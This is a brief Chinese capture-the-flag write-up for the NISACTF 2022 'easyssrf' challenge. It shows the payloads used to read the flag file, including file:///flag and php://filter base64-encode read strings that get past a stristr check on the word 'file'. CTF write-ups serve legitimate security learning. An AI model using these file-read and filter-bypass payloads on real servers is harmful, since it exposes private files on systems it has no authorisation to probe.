[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
一名优秀的码农5 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp6 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp6 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人6 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp6 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0076 天前
渗透测试_漏洞利用
网络安全
啥都想学点6 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ6 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏6 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk6 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全